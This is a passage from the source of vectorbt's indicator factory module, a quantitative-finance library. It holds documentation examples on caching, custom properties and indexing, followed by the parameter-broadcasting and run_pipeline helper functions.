>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
264 ms ± 3.22 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
```
To avoid this, let's cache all unique rolling windows:
```python-repl
>>> @njit
... def cache_func_nb(price, ws1, ws2):
... cache_dict = dict()
... ws = ws1.copy()
... ws.extend(ws2)
... for i in range(len(ws)):
... h = hash((ws[i]))
... if h not in cache_dict:
... cache_dict[h] = roll_mean_expensive_nb(price, ws[i])
... return cache_dict
>>> @njit
... def apply_func_nb(price, w1, w2, cache_dict):
... return (cache_dict[hash(w2)] - cache_dict[hash(w1)]) / cache_dict[hash(w1)]
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['w1', 'w2'],
... output_names=['output'],
... ).from_apply_func(apply_func_nb, cache_func=cache_func_nb)
>>> MyInd.run(price, 2, 3).output
custom_w1 2
custom_w2 3
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 -0.200000 0.142857
2020-01-04 -0.142857 0.200000
2020-01-05 -0.111111 0.333333
>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
145 ms ± 4.55 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
We have cut down the processing time almost in half.
Similar to raw outputs, we can force `IndicatorFactory` to return the cache, so it can be used
in other calculations or even indicators. The clear advantage of this approach is that we don't
rely on some fixed set of parameter combinations anymore, but on the values of each parameter,
which gives us more granularity in managing performance.
```python-repl
>>> cache = MyInd.run(price, 2, np.arange(2, 1000), return_cache=True)
>>> %timeit MyInd.run(price, np.arange(2, 1000), np.arange(2, 1000), use_cache=cache)
30.1 ms ± 2 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
## Custom properties and methods
Use `custom_output_props` argument when constructing an indicator to define lazy outputs -
outputs that are processed only when explicitly called. They will become cached properties
and, in contrast to regular outputs, they can have an arbitrary shape. For example, let's
attach a property that will calculate the distance between the moving average and the price.
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window'],
... output_names=['ma'],
... custom_output_props=dict(distance=lambda self: (self.price - self.ma) / self.ma)
... ).from_apply_func(vbt.nb.rolling_mean_nb)
>>> MyInd.run(price, [2, 3]).distance
custom_window 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 0.333333 -0.111111 NaN NaN
2020-01-03 0.200000 -0.142857 0.500000 -0.250000
2020-01-04 0.142857 -0.200000 0.333333 -0.333333
2020-01-05 0.111111 -0.333333 0.250000 -0.500000
```
Another way of defining own properties and methods is subclassing:
```python-repl
>>> class MyIndExtended(MyInd):
... def plot(self, column=None, **kwargs):
... self_col = self.select_series(column=column, group_by=False)
... return self.ma.vbt.plot(**kwargs)
>>> MyIndExtended.run(price, [2, 3])[(2, 'a')].plot()
```

## Helper properties and methods
For all in `input_names`, `in_output_names`, `output_names`, and `custom_output_props`,
`IndicatorFactory` will create a bunch of comparison and combination methods, such as for generating signals.
What kind of methods are created can be regulated using `dtype` in the `attr_settings` dictionary.
```python-repl
>>> from collections import namedtuple
>>> MyEnum = namedtuple('MyEnum', ['one', 'two'])(0, 1)
>>> def apply_func_nb(price):
... out_float = np.empty(price.shape, dtype=np.float_)
... out_bool = np.empty(price.shape, dtype=np.bool_)
... out_enum = np.empty(price.shape, dtype=np.int_)
... return out_float, out_bool, out_enum
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out_float', 'out_bool', 'out_enum'],
... attr_settings=dict(
... out_float=dict(dtype=np.float_),
... out_bool=dict(dtype=np.bool_),
... out_enum=dict(dtype=MyEnum)
... )).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> dir(myind)
[
...
'out_bool',
'out_bool_and',
'out_bool_or',
'out_bool_xor',
'out_enum',
'out_enum_readable',
'out_float',
'out_float_above',
'out_float_below',
'out_float_equal',
...
'price',
'price_above',
'price_below',
'price_equal',
...
]
```
Each of these methods and properties are created for sheer convenience: to easily combine
boolean arrays using logical rules and to compare numeric arrays. All operations are done
strictly using NumPy. Another advantage is utilization of vectorbt's own broadcasting, such
that one can combine inputs and outputs with an arbitrary array-like object, given their
shapes can broadcast together.
We can also do comparison with multiple objects at once by passing them as a tuple/list:
```python-repl
>>> myind.price_above([1.5, 2.5])
custom_price_above 1.5 2.5
a b a b
2020-01-01 False True False True
2020-01-02 True True False True
2020-01-03 True True True True
2020-01-04 True True True False
2020-01-05 True False True False
```
## Indexing
`IndicatorFactory` attaches pandas indexing to the indicator class thanks to
`vectorbt.base.array_wrapper.ArrayWrapper`. Supported are `iloc`, `loc`,
`*param_name*_loc`, `xs`, and `__getitem__`.
This makes possible accessing rows and columns by labels, integer positions, and parameters.
```python-repl
>>> ma = vbt.MA.run(price, [2, 3])
>>> ma[(2, 'b')]
<vectorbt.indicators.basic.MA at 0x7fe4d10ddcc0>
>>> ma[(2, 'b')].ma
2020-01-01 NaN
2020-01-02 4.5
2020-01-03 3.5
2020-01-04 2.5
2020-01-05 1.5
Name: (2, b), dtype: float64
>>> ma.window_loc[2].ma
a b
2020-01-01 NaN NaN
2020-01-02 1.5 4.5
2020-01-03 2.5 3.5
2020-01-04 3.5 2.5
2020-01-05 4.5 1.5
```
## TA-Lib
Indicator factory also provides a class method `IndicatorFactory.from_talib`
that can be used to wrap any function from TA-Lib. It automatically fills all the
neccessary information, such as input, parameter and output names.
"""
import numpy as np
import pandas as pd
from numba import njit
from numba.typed import List
import itertools
import inspect
from collections import OrderedDict
import warnings
from vectorbt.utils import checks
from vectorbt.utils.decorators import classproperty, cached_property
from vectorbt.utils.config import merge_dicts
from vectorbt.utils.random import set_seed
from vectorbt.utils.params import (
to_typed_list,
broadcast_params,
create_param_product,
DefaultParam
)
from vectorbt.utils.enum import convert_str_enum_value
from vectorbt.base import index_fns, reshape_fns, combine_fns
from vectorbt.base.indexing import ParamIndexerFactory
from vectorbt.base.array_wrapper import ArrayWrapper, Wrapping
def params_to_list(params, is_tuple, is_array_like):
"""Cast parameters to a list."""
check_against = [list, List]
if not is_tuple:
check_against.append(tuple)
if not is_array_like:
check_against.append(np.ndarray)
check_against = tuple(check_against)
if isinstance(params, check_against):
new_params = list(params)
else:
new_params = [params]
return new_params
def prepare_params(param_list, param_settings, input_shape=None, to_2d=False):
"""Prepare parameters."""
new_param_list = []
for i, params in enumerate(param_list):
_param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i]
is_tuple = _param_settings.get('is_tuple', False)
dtype = _param_settings.get('dtype', None)
if checks.is_namedtuple(dtype):
params = convert_str_enum_value(dtype, params)
is_array_like = _param_settings.get('is_array_like', False)
bc_to_input = _param_settings.get('bc_to_input', False)
broadcast_kwargs = _param_settings.get('broadcast_kwargs', dict(require_kwargs=dict(requirements='W')))
new_params = params_to_list(params, is_tuple, is_array_like)
if bc_to_input is not False:
# Broadcast to input or its axis
if is_tuple:
raise ValueError("Tuples cannot be broadcast to input")
if input_shape is None:
raise ValueError("Cannot broadcast to input if input shape is unknown. Pass input_shape.")
if bc_to_input is True:
to_shape = input_shape
else:
checks.assert_in(bc_to_input, (0, 1))
# Note that input_shape can be 1D
if bc_to_input == 0:
to_shape = input_shape[0]
else:
to_shape = input_shape[1] if len(input_shape) > 1 else (1,)
_new_params = reshape_fns.broadcast(
*new_params,
to_shape=to_shape,
**broadcast_kwargs
)
if len(new_params) == 1:
_new_params = (_new_params,)
if to_2d and bc_to_input is True:
# If inputs are meant to reshape to 2D, do the same to parameters
# But only to those that fully resemble inputs (= not raw)
__new_params = list(_new_params)
for j, param in enumerate(__new_params):
keep_raw = broadcast_kwargs.get('keep_raw', False)
if keep_raw is False or (isinstance(keep_raw, (tuple, list)) and not keep_raw[j]):
__new_params[j] = reshape_fns.to_2d(param)
new_params = __new_params
else:
new_params = _new_params
new_param_list.append(new_params)
return new_param_list
def build_columns(param_list, input_columns, level_names=None, hide_levels=None,
param_settings=None, per_column=False, ignore_default=False, **kwargs):
"""For each parameter in `param_list`, create a new column level with parameter values
and stack it on top of `input_columns`.
Returns a list of parameter indexes and new columns."""
if level_names is not None:
checks.assert_len_equal(param_list, level_names)
if hide_levels is None:
hide_levels = []
if param_settings is None:
param_settings = {}
param_indexes = []
shown_param_indexes = []
for i in range(len(param_list)):
params = param_list[i]
level_name = None
if level_names is not None:
level_name = level_names[i]
if per_column:
param_index = index_fns.index_from_values(params, name=level_name)
else:
_param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i]
_per_column = _param_settings.get('per_column', False)
if _per_column:
param_index = None
for param in params:
bc_param = np.broadcast_to(param, len(input_columns))
_param_index = index_fns.index_from_values(bc_param, name=level_name)
if param_index is None:
param_index = _param_index
else:
param_index = param_index.append(_param_index)
if len(param_index) == 1 and len(input_columns) > 1:
# When using flexible column-wise parameters
param_index = index_fns.repeat_index(
param_index,
len(input_columns),
ignore_default=ignore_default
)
else:
param_index = index_fns.index_from_values(param_list[i], name=level_name)
param_index = index_fns.repeat_index(
param_index,
len(input_columns),
ignore_default=ignore_default
)
param_indexes.append(param_index)
if i not in hide_levels:
shown_param_indexes.append(param_index)
if len(shown_param_indexes) > 0:
if not per_column:
n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
input_columns = index_fns.tile_index(
input_columns,
n_param_values,
ignore_default=ignore_default
)
stacked_columns = index_fns.stack_indexes([*shown_param_indexes, input_columns], **kwargs)
return param_indexes, stacked_columns
return param_indexes, input_columns
def run_pipeline(
num_ret_outputs,
custom_func,
*args,
require_input_shape=False,
input_shape=None,
input_index=None,
input_columns=None,
input_list=None,
in_output_list=None,
in_output_settings=None,
broadcast_kwargs=None,
param_list=None,
param_product=False,
param_settings=None,
speedup=False,
silence_warnings=False,
per_column=False,
pass_col=False,
keep_pd=False,
to_2d=True,
as_lists=False,
pass_input_shape=False,
pass_flex_2d=False,
level_names=None,
hide_levels=None,
stacking_kwargs=None,
return_raw=False,
use_raw=None,
wrapper_kwargs=None,
seed=None,
**kwargs):
"""A pipeline for running an indicator, used by `IndicatorFactory`.
Args:
num_ret_outputs (int): The number of output arrays returned by `custom_func`.
custom_func (callable): A custom calculation function.
See `IndicatorFactory.from_custom_func`.
*args: Arguments passed to the `custom_func`.
require_input_shape (bool): Whether to input shape is required.
Will set `pass_input_shape` to True and raise an error if `input_shape` is None.
input_shape (tuple): Shape to broadcast each input to.
Can be passed to `custom_func`. See `pass_input_shape`.
input_index (any): Sets index of each input.
Can be used to label index if no inputs passed.
input_columns (any): Sets columns of each input.
Can be used to label columns if no inputs passed.
input_list (list of array_like): A list of input arrays.
in_output_list (list of array_like): A list of in-place output arrays.
If an array should be generated, pass None.
in_output_settings (dict or list of dict): Settings corresponding to each in-place output.
Following keys are accepted:
* `dtype`: Create this array using this data type and `np.empty`. Default is None.
broadcast_kwargs (dict): Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`
to broadcast inputs.
param_list (list of array_like): A list of parameters.
Each element is either an array-like object or a single value of any type.
param_product (bool): Whether to build a Cartesian product out of all parameters.
param_settings (dict or list of dict): Settings corresponding to each parameter.
Following keys are accepted:
* `dtype`: If data type is enumerated type and a string as parameter value was passed,
will convert it to integer first.
* `is_tuple`: If tuple was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `is_array_like`: If array-like object was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `bc_to_input`: Whether to broadcast parameter to input size. You can also broadcast
parameter to an axis by passing an integer.
* `broadcast_kwargs`: Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`.
* `per_column`: Whether each parameter value can be split per column such that it can
be better reflected in a multi-index. Does not affect broadcasting.
speedup (bool): Whether to run only on unique parameter combinations.
Disable if two identical parameter combinations can lead to different results
(e.g., due to randomness) or if inputs are large and `custom_func` is fast.
!!! note
Cache, raw output, and output objects outside of `num_ret_outputs` will be returned
for unique parameter combinations only.
silence_warnings (bool): Whether to hide warnings such as coming from `speedup`.
per_column (bool): Whether to split the DataFrame into Series, one per column, and run `custom_func`
on each Series.
Each list of parameter values will be broadcast to the number of columns and
each parameter value will be applied per Series rather than per DataFrame.
Input shape must be known beforehand.
pass_col (bool): Whether to pass column index as keyword argument if `per_column` is set to True.
keep_pd (bool): Whether to keep inputs as pandas objects, otherwise convert to NumPy arrays.
to_2d (bool): Whether to reshape inputs to 2-dim arrays, otherwise keep as-is.
as_lists (bool): Whether to pass inputs and parameters to `custom_func` as lists.
If `custom_func` is Numba-compiled, passes tuples.
pass_input_shape (bool): Whether to pass `input_shape` to `custom_func` as keyword argument.
pass_flex_2d (bool): Whether to pass `flex_2d` to `custom_func` as keyword argument.
level_names (list of str): A list of column level names corresponding to each parameter.
Should have the same length as `param_list`.
hide_levels (list): A list of indices of parameter levels to hide.
stacking_kwargs (dict): Keyword arguments passed to `vectorbt.base.index_fns.repeat_index`,
`vectorbt.base.index_fns.tile_index`, and `vectorbt.base.index_fns.stack_indexes`
when stacking parameter and input column levels.
return_raw (bool): Whether to return raw output without post-processing and hashed parameter tuples.
use_raw (bool): Takes the raw results and uses them instead of running `custom_func`.
wrapper_kwargs (dict): Keyword arguments passed to `vectorbt.base.array_wrapper.ArrayWrapper`.
seed (int): Set seed to make output deterministic.
**kwargs: Keyword arguments passed to the `custom_func`.
Some common arguments include `return_cache` to return cache and `use_cache` to use cache.
Those are only applicable to `custom_func` that supports it (`custom_func` created using
`IndicatorFactory.from_apply_func` are supported by default).
Returns:
Array wrapper, list of inputs (`np.ndarray`), input mapper (`np.ndarray`), list of outputs
(`np.ndarray`), list of parameter arrays (`np.ndarray`), list of parameter mappers (`np.ndarray`),
list of outputs that are outside of `num_ret_outputs`.
## Explanation
Here is a subset of tasks that the function `run_pipeline` does:
* Takes one or multiple array objects in `input_list` and broadcasts them.
```python-repl
>>> sr = pd.Series([1, 2], index=['x', 'y'])
>>> df = pd.DataFrame([[3, 4], [5, 6]], index=['x', 'y'], columns=['a', 'b'])
>>> input_list = vbt.base.reshape_fns.broadcast(sr, df)
>>> input_list[0]
a b
x 1 1
y 2 2
>>> input_list[1]
a b
x 3 4
y 5 6
```
* Takes one or multiple parameters in `param_list`, converts them to NumPy arrays and
broadcasts them.
```python-repl
>>> p1, p2, p3 = 1, [2, 3, 4], [False]
>>> param_list = vbt.base.reshape_fns.broadcast(p1, p2, p3)
>>> param_list[0]
array([1, 1, 1])
>>> param_list[1]
array([2, 3, 4])
>>> param_list[2]
array([False, False, False])
```
* Performs calculation using `custom_func` to build output arrays (`output_list`) and
other objects (`other_list`, optionally).
```python-repl
>>> def custom_func(ts1, ts2, p1, p2, p3, *args, **kwargs):
... return np.hstack((
... ts1 + ts2 + p1[0] * p2[0],
... ts1 + ts2 + p1[1] * p2[1],
... ts1 + ts2 + p1[2] * p2[2],
... ))
>>> output = custom_func(*input_list, *param_list)
>>> output
array([[ 6, 7, 7, 8, 8, 9],
[ 9, 10, 10, 11, 11, 12]])
```
* Creates new column hierarchy based on parameters and level names.
```python-repl
>>> p1_columns = pd.Index(param_list[0], name='p1')
>>> p2_columns = pd.Index(param_list[1], name='p2')
>>> p3_columns = pd.Index(param_list[2], name='p3')
>>> p_columns = vbt.base.index_fns.stack_indexes([p1_columns, p2_columns, p3_columns])
>>> new_columns = vbt.base.index_fns.combine_indexes([p_columns, input_list[0].columns])
>>> output_df = pd.DataFrame(output, columns=new_columns)
>>> output_df
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 6 7 7 8 8 9
1 9 10 10 11 11 12
```
* Broadcasts objects in `input_list` to match the shape of objects in `output_list` through tiling.
This is done to be able to compare them and generate signals, since we cannot compare NumPy
arrays that have totally different shapes, such as (2, 2) and (2, 6).
```python-repl
>>> new_input_list = [
... input_list[0].vbt.tile(len(param_list[0]), keys=p_columns),
... input_list[1].vbt.tile(len(param_list[0]), keys=p_columns)
... ]
>>> new_input_list[0]
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 1 1 1 1 1 1
1 2 2 2 2 2 2
```
* Builds parameter mappers that will link parameters from `param_list` to columns in
`input_list` and `output_list`. This is done to enable column indexing using parameter values.
"""
if require_input_shape:
checks.assert_not_none(input_shape)
pass_input_shape = True
if input_list is None:
input_list = []
if in_output_list is None:
in_output_list = []
if in_output_settings is None:
in_output_settings = {}
in_output_settings_keys = ['dtype']
if isinstance(in_output_settings, dict):
checks.assert_dict_valid(in_output_settings, [in_output_settings_keys])
else:
for _in_output_settings in in_output_settings:
checks.assert_dict_valid(_in_output_settings, [in_output_settings_keys])
if broadcast_kwargs is None:
broadcast_kwargs = {}
if param_list is None:
param_list = []
if param_settings is None:
param_settings = {}
param_settings_keys = [
'dtype',
'is_tuple',
'is_array_like',
'bc_to_input',
'broadcast_kwargs',
'per_column'
]
if isinstance(param_settings, dict):
checks.assert_dict_valid(param_settings, [param_settings_keys])
else:
for _param_settings in param_settings:
checks.assert_dict_valid(_param_settings, [param_settings_keys])
if hide_levels is None:
hide_levels = []
if stacking_kwargs is None:
stacking_kwargs = {}
if wrapper_kwargs is None:
wrapper_kwargs = {}
if keep_pd and checks.is_numba_func(custom_func):
raise ValueError("Cannot pass pandas objects to a Numba-compiled custom_func. Set keep_pd to False.")
in_output_idxs = [i for i, x in enumerate(in_output_list) if x is not None]
if len(in_output_idxs) > 0:
# In-place outputs should broadcast together with inputs
input_list += [in_output_list[i] for i in in_output_idxs]
if len(input_list) > 0:
# Broadcast inputs
if input_index is None:
input_index = 'default'
if input_columns is None:
input_columns = 'default'
# If input_shape is provided, will broadcast all inputs to this shape
broadcast_kwargs = merge_dicts(dict(
to_shape=input_shape,
index_from=input_index,
columns_from=input_columns
), broadcast_kwargs)
bc_input_list, input_shape, input_index, input_columns = reshape_fns.broadcast(
*input_list,
return_meta=True,
**broadcast_kwargs
)
if len(input_list) == 1:
bc_input_list = (bc_input_list,)
input_list = list(map(np.asarray, bc_input_list))
bc_in_output_list = []
if len(in_output_idxs) > 0:
# Separate inputs and in-place outputs
bc_in_output_list = input_list[-len(in_output_idxs):]
input_list = input_list[:-len(in_output_idxs)]
# Reshape input shape
if input_shape is not None and not isinstance(input_shape, tuple):
input_shape = (input_shape,)
# Keep original input_shape for per_column=True
orig_input_shape = input_shape
orig_input_shape_2d = input_shape
if input_shape is not None:
orig_input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if per_column:
# input_shape is now the size of one column
if input_shape is None:
raise ValueError("input_shape is required when per_column=True")
input_shape = (input_shape[0],)
input_shape_ready = input_shape
input_shape_2d = input_shape
if input_shape is not None:
input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if to_2d:
if input_shape is not None:
input_shape_ready = input_shape_2d # ready for custom_func
# Prepare parameters
# NOTE: input_shape instead of input_shape_ready since parameters should
# broadcast by the same rules as inputs
param_list = prepare_params(param_list, param_settings, input_shape=input_shape, to_2d=to_2d)
if len(param_list) > 1:
# Check level names
checks.assert_type(level_names, (list, tuple))
checks.assert_len_equal(param_list, level_names)
# Columns should be free of the specified level names
if input_columns is not None:
for level_name in level_names:
if level_name is not None:
checks.assert_level_not_exists(input_columns, level_name)
if param_product:
# Make Cartesian product out of all params
param_list = create_param_product(param_list)
if len(param_list) > 0:
# Broadcast such that each array has the same length
if per_column:
# The number of parameters should match the number of columns before split
param_list = broadcast_params(param_list, to_n=orig_input_shape_2d[1])
else:
param_list = broadcast_params(param_list)
n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
use_speedup = False
param_list_unique = param_list
if not per_column and speedup:
try:
# Try to get all unique parameter combinations
param_tuples = list(zip(*param_list))
unique_param_tuples = list(OrderedDict.fromkeys(param_tuples).keys())
if len(unique_param_tuples) < len(param_tuples):
param_list_unique = list(map(list, zip(*unique_param_tuples)))
use_speedup = True
except:
pass
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
param_list_ready = [to_typed_list(params) for params in param_list_unique]
else:
param_list_ready = param_list_unique
n_unique_param_values = len(param_list_unique[0]) if len(param_list_unique) > 0 else 1
# Prepare inputs
if per_column:
# Split each input into Series/1-dim arrays, one per column
input_list_ready = []
for input in input_list:
input_2d = reshape_fns.to_2d(input)
col_inputs = []
for i in range(input_2d.shape[1]):
if to_2d:
col_input = input_2d[:, [i]]
else:
col_input = input_2d[:, i]
if keep_pd:
# Keep as pandas object
col_input = ArrayWrapper(input_index, input_columns[[i]], col_input.ndim).wrap(col_input)
col_inputs.append(col_input)
input_list_ready.append(col_inputs)
else:
input_list_ready = []
for input in input_list:
new_input = input
if to_2d:
new_input = reshape_fns.to_2d(input)
if keep_pd:
# Keep as pandas object
new_input = ArrayWrapper(input_index, input_columns, new_input.ndim).wrap(new_input)
input_list_ready.append(new_input)
# Prepare in-place outputs
in_output_list_ready = []
j = 0
for i in range(len(in_output_list)):
if input_shape_2d is None:
raise ValueError("input_shape is required when using in-place outputs")
if i in in_output_idxs:
# This in-place output has been already broadcast with inputs
in_output_wide = np.require(bc_in_output_list[j], requirements='W')
if not per_column:
# One per parameter combination
in_output_wide = reshape_fns.tile(in_output_wide, n_unique_param_values, axis=1)
j += 1
else:
# This in-place output hasn't been provided, so create empty
_in_output_settings = in_output_settings if isinstance(in_output_settings, dict) else in_output_settings[i]
dtype = _in_output_settings.get('dtype', None)
in_output_shape = (input_shape_2d[0], input_shape_2d[1] * n_unique_param_values)
in_output_wide = np.empty(in_output_shape, dtype=dtype)
in_output_list[i] = in_output_wide
in_outputs = []
# Split each in-place output into chunks, each of input shape, and append to a list
for i in range(n_unique_param_values):
in_output = in_output_wide[:, i * input_shape_2d[1]: (i + 1) * input_shape_2d[1]]
if len(input_shape_ready) == 1:
in_output = in_output[:, 0]
if keep_pd:
if per_column:
in_output = ArrayWrapper(input_index, input_columns[[i]], in_output.ndim).wrap(in_output)
else:
in_output = ArrayWrapper(input_index, input_columns, in_output.ndim).wrap(in_output)
in_outputs.append(in_output)
in_output_list_ready.append(in_outputs)
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
in_output_list_ready = [to_typed_list(in_outputs) for in_outputs in in_output_list_ready]
def _use_raw(_raw):
# Use raw results of previous run to build outputs
_output_list, _param_map, _n_input_cols, _other_list = _raw
idxs = np.array([_param_map.index(param_tuple) for param_tuple in zip(*param_list)])
_output_list = [
np.hstack([o[:, idx * _n_input_cols:(idx + 1) * _n_input_cols] for idx in idxs])
for o in _output_list
]
return _output_list, _param_map, _n_input_cols, _other_list
# Get raw results
if use_raw is not None:
# Use raw results of previous run to build outputs
output_list, param_map, n_input_cols, other_list = _use_raw(use_raw)
else:
# Prepare other arguments
func_args = args
func_kwargs = {}
if pass_input_shape:
func_kwargs['input_shape'] = input_shape_ready
if pass_flex_2d:
if input_shape is None:
raise ValueError("Cannot determine flex_2d without inputs")
func_kwargs['flex_2d'] = len(input_shape) == 2
func_kwargs = merge_dicts(func_kwargs, kwargs)
# Set seed
if seed is not None:
set_seed(seed)
def _call_custom_func(_input_list_ready, _in_output_list_ready, _param_list_ready, *_func_args, **_func_kwargs):
# Run the function
if as_lists:
if checks.is_numba_func(custom_func):
return custom_func(
tuple(_input_list_ready),
tuple(_in_output_list_ready),
tuple(_param_list_ready),
*_func_args, **_func_kwargs
)
return custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args, **_func_kwargs
)
return custom_func(
*_input_list_ready,
*_in_output_list_ready,
*_param_list_ready,
*_func_args, **_func_kwargs
)
if per_column:
output = []
for col in range(orig_input_shape_2d[1]):
# Select the column of each input and in-place output, and the respective parameter combination
_input_list_ready = []
for _inputs in input_list_ready:
# Each input array is now one column wide
_input_list_ready.append(_inputs[col])
_in_output_list_ready = []
for _in_outputs in in_output_list_ready:
# Each in-output array is now one column wide
if isinstance(_in_outputs, List):
__in_outputs = List()
else:
__in_outputs = []
__in_outputs.append(_in_outputs[col])
_in_output_list_ready.append(__in_outputs)
_param_list_ready = []
for _params in param_list_ready:
# Each parameter list is now one element long
if isinstance(_params, List):
__params = List()
else:
__params = []
__params.append(_params[col])
_param_list_ready.append(__params)
_func_args = func_args
_func_kwargs = func_kwargs.copy()
if 'use_cache' in func_kwargs:
use_cache = func_kwargs['use_cache']
if isinstance(use_cache, list) and len(use_cache) == orig_input_shape_2d[1]:
# Pass cache for this column
_func_kwargs['use_cache'] = func_kwargs['use_cache'][col]
if pass_col:
_func_kwargs['col'] = col
col_output = _call_custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args,
**_func_kwargs
)
output.append(col_output)
else:
output = _call_custom_func(
input_list_ready,
in_output_list_ready,
param_list_ready,
*func_args,
**func_kwargs
)
# Return cache
if kwargs.get('return_cache', False):
if use_speedup and not silence_warnings:
warnings.warn("Cache is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return output
def _split_output(output):
# Post-process results
if output is None:
_output_list = []
_other_list = []
else:
if isinstance(output, (tuple, list, List)):
_output_list = list(output)
else:
_output_list = [output]
# Other outputs should be returned without post-processing (for example cache_dict)
if len(_output_list) > num_ret_outputs:
_other_list = _output_list[num_ret_outputs:]
if use_speedup and not silence_warnings:
warnings.warn("Additional output objects are produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
else:
_other_list = []
# Process only the num_ret_outputs outputs
_output_list = _output_list[:num_ret_outputs]
if len(_output_list) != num_ret_outputs:
raise ValueError("Number of returned outputs other than expected")
_output_list = list(map(lambda x: reshape_fns.to_2d(x, raw=True), _output_list))
return _output_list, _other_list
if per_column:
output_list = []
other_list = []
for _output in output:
__output_list, __other_list = _split_output(_output)
output_list.append(__output_list)
if len(__other_list) > 0:
other_list.append(__other_list)
# Concatenate each output (must be one column wide)
output_list = [np.hstack(input_group) for input_group in zip(*output_list)]
else:
output_list, other_list = _split_output(output)
# In-place outputs are treated as outputs from here
output_list = in_output_list + output_list
# Prepare raw
param_map = list(zip(*param_list_unique)) # account for use_speedup
output_shape = output_list[0].shape
for output in output_list:
if output.shape != output_shape:
raise ValueError("All outputs must have the same shape")
if per_column:
n_input_cols = 1
else:
n_input_cols = output_shape[1] // n_unique_param_values
if input_shape_2d is not None:
if n_input_cols != input_shape_2d[1]:
if per_column:
raise ValueError("All outputs must have one column when per_column=True")
else:
raise ValueError("All outputs must have the number of columns = #input columns x #parameters")
raw = output_list, param_map, n_input_cols, other_list
if return_raw:
if use_speedup and not silence_warnings:
warnings.warn("Raw output is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return raw
if use_speedup:
output_list, param_map, n_input_cols, other_list = _use_raw(raw)
# Update shape and other meta if no inputs
if input_shape is None:
if n_input_cols == 1:
input_shape = (output_list[0].shape[0],)
else:
input_shape = (output_list[0].shape[0], n_input_cols)
else:
input_shape = orig_input_shape
if input_index is None:
input_index = pd.RangeIndex(start=0, step=1, stop=input_shape[0])
if input_columns is None:
input_columns = pd.RangeIndex(start=0, step=1, stop=input_shape[1] if len(input_shape) > 1 else 1)
# Build column hierarchy and create mappers
if len(param_list) > 0:
# Build new column levels on top of input levels
param_indexes, new_columns = build_columns(
param_list,
input_columns,
level_names=level_names,
hide_levels=hide_levels,
param_settings=param_settings,
per_column=per_column,
**stacking_kwargs
)
# Build a mapper that maps old columns in inputs to new columns
# Instead of tiling all inputs to the shape of outputs and wasting memory,
# we just keep a mapper and perform the tiling when needed
input_mapper = None
if len(input_list) > 0:
if per_column:
input_mapper = np.arange(len(input_columns))
else:
input_mapper = np.tile(np.arange(len(input_columns)), n_param_values)
# Build mappers to easily map between parameters and columns
mapper_list = [param_indexes[i] for i in range(len(param_list))]
else:
# Some indicators don't have any params
new_columns = input_columns
input_mapper = None
mapper_list = []
# Return artifacts: no pandas objects, just a wrapper and NumPy arrays
new_ndim = len(input_shape) if output_list[0].shape[1] == 1 else output_list[0].ndim
wrapper = ArrayWrapper(input_index, new_columns, new_ndim, **wrapper_kwargs)
return wrapper, \
input_list, \
input_mapper, \
output_list[:len(in_output_list)], \
output_list[len(in_output_list):], \
param_list, \
mapper_list, \
other_list
def perform_init_checks(wrapper, input_list, input_mapper, in_output_list, output_list,
param_list, mapper_list, short_name, level_names):
"""Perform checks on objects created by running or slicing an indicator."""
if input_mapper is not None:
checks.assert_equal(input_mapper.shape[0], wrapper.shape_2d[1])
for ts in input_list:
checks.assert_equal(ts.shape[0], wrapper.shape_2d[0])
for ts in in_output_list + output_list:
checks.assert_equal(ts.shape, wrapper.shape_2d)
for params in param_list:
checks.assert_len_equal(param_list[0], params)
for mapper in mapper_list:
checks.assert_equal(len(mapper), wrapper.shape_2d[1])
checks.assert_type(short_name, str)
checks.assert_len_equal(level_names, param_list)
def combine_objs(obj, other, *args, level_name=None, keys=None, **kwargs):
"""Combines/compares `obj` to `other`, for example, to generate signals.
Both will be broadcast together.
Pass `other` as a tuple or a list to compare with multiple arguments.
In this case, a new column level will be created with the name `level_name`.
See `vectorbt.base.accessors.BaseAccessor.combine`."""
if isinstance(other, (tuple, list)):
if keys is None:
keys = index_fns.index_from_values(other, name=level_name)
return obj.vbt.combine(other, *args, keys=keys, concat=True, **kwargs)
def f(*args):
return type(*args)
class IndicatorFactory:
def __init__(self,
class_name='Indicator',
class_docstring='',
module_name=__name__,
short_name=None,
prepend_name=True,
input_names=None,
param_names=None,
in_output_names=None,
output_names=None,
output_flags=None,
custom_output_props=None,
attr_settings=None):
"""A factory for creating new indicators.
Initialize `IndicatorFactory` to create a skeleton and then use a class method
such as `IndicatorFactory.from_custom_func` to bind a calculation function to the skeleton.
Args:
class_name (str): Name for the created indicator class.
class_docstring (str): Docstring for the created indicator class.
module_name (str): Specify the module the class originates from.
short_name (str): A short name of the indicator.
Defaults to lower-case `class_name`.
prepend_name (bool): Whether to prepend `short_name` to each parameter level.
input_names (list of str): A list of names of input arrays.
param_names (list of str): A list of names of parameters.
